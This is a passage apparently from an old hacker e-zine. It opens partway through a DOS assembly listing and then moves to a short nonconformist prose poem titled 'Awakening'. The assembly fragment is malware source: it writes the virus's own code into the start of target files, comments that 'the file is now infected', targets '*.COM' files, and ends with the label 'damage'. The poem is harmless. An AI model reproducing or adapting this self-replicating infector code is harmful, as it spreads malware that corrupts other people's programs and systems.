dx,dx ;Zero DX xor cx,cx ;Zero CX mov ax,4200h ;File seek function at int 21h ;the start. mov ah,40h ;DOS Write file function mov dx,offset start ;DX points to start of code mov cx,virus_length ;Put size of virus in CX int 21h ;Write virus into file close: mov ah,3eh ;DOS Close file function int 21h ;The file is now infected and closed popf ;Restore flags ret ;Return holdit dw ? ;Buffer used to hold first 2 bytes infect endp filespec db '*.COM',0 ;File type is *.COM finish label near code ends end damage ------------------------------------------------------------------------------- THOUGHTS, POEMS AND CREATIVE WRITING - {WRITING} Awakening: I traverse into the darkness, like a soldier on a search and destroy mission that's encompassed by the jungle of Vietnam. Stealthfully I journey onward towards the source of my own existence, limitations and ultimate downfall. As I look into the blinding blackness, I find the enemy within. My mind is now clear and sound. The obscure, disturbing thoughts have faded to black and I realize the true meaning of my discovery. Everyone has an enemy within them. To contemplate its destruction, you must understand its purpose. To comprehend its purpose you must know how the enemy attacks your own thoughts and lives in your inner being. The enemy devours creativity, innovativeness, individualism and free thought. It preys upon your weakness and drains your ideas and opinions away. True freedom can only be obtained by making a conscious decision not to conform. Fight against control. Break free of the shackles that bind you and experience reality. Self-awakening cannot be explained. To achieve enlightenment, you must define your own uniqueness and live by it. Eliminate the enemy and you will be free.